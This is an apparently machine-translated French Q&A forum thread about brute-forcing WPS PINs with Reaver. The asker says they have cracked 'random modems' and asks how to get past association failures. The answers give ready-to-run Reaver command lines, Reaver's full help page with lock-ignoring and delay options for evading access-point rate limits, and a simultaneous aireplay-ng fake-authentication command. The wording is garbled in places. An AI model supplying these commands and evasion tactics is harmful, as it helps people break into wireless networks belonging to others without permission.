Reaver avait l'habitude de travailler si couramment que je ne réussissais pas à m'associer.


2

Je suis en train de lancer debian avec amd64 sur une dell inspiron 1564 avec un adaptateur pci Broadcom BCM4312 de la famille B43xx.

J'utilise aussi la dernière version de Reaver. Je sais que cet adaptateur n’est pas compatible avec Linux. Il n’a pas été installé avec le disque. Il m’a demandé un fichier fw, mais j’ai réussi à le faire fonctionner, je peux surfer sur le Web. .

à ma question j'ai été capable de craquer mes modems aléatoires utilisant tous wps. depuis que j'ai cet ordinateur, AUCUN.!

ce qui se passe, c’est qu’il commence à associer, BAM puis qu’il commence à essayer BAM puis, après environ 1% - 4%, il commencera à donner à FAILED TO ASSOCIATE toutes les minutes, il pourra le faire toute la nuit.

J'ai essayé environ 15 modems différents et même histoire

y at-il une astuce pour contourner cela, peut-être ajouter plus de commandes pour faire quelque chose qui garantira presque le succès?

Merci

Réponses:


3

Rever est une bête délicate qui nécessite des soins attentionnés pour travailler. Il est très probable que ce qui se passe si le point d’accès atteint le nombre maximal de tentatives allouées au cours d’une période donnée.

Vous devrez ralentir votre attaque.

Si vous tapez reaver -h, vous pouvez voir une liste de toutes les options disponibles.

Vous devrez expérimenter avec ces options.

essayez d'utiliser

-a (auto detect beset options)  
-d (give a long delay between requests)  
-r (sleep after so many attempts)  
-vv (very verbose, will show everything that is going on. You can then google any error messages you see)  
-x (time to sleep after 10 failures)  

Ma configuration standard. Si cela ne fonctionne pas, je commence à ajouter des indicateurs tels que -x ou -r.

reaver -i mono0 -c 1 -b <someMacAddress> -vv -a 

Page d'aide

root@kali:/etc/apt# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]

2

Il suffit de faire:

reaver with -N option

Ne faites rien en utilisant l' -aoption au début. Essayez également de vous associer à Aireplay.

Alors faites ceci:

reaver -i wlan0 -b 00:12:34:56:78 -vv -N -S -A

Faire simultanément:

aireplay-ng -1 5 -a 00:12:34:56:78 wlan0 

Si vous rencontrez des problèmes d'association avec AP, n'essayez pas avec Aireplay-ng -1 30ou avec des nombres plus grands.


Cette question a 2 ans ou plus et une réponse claire, bien expliquée et acceptée. Alors que de nouvelles idées / approches sont toujours appréciées, pourquoi exactement cette réponse est-elle préférable à la réponse acceptée?
JakeGould
En utilisant notre site, vous reconnaissez avoir lu et compris notre politique liée aux cookies et notre politique de confidentialité.
Licensed under cc by-sa 3.0 with attribution required.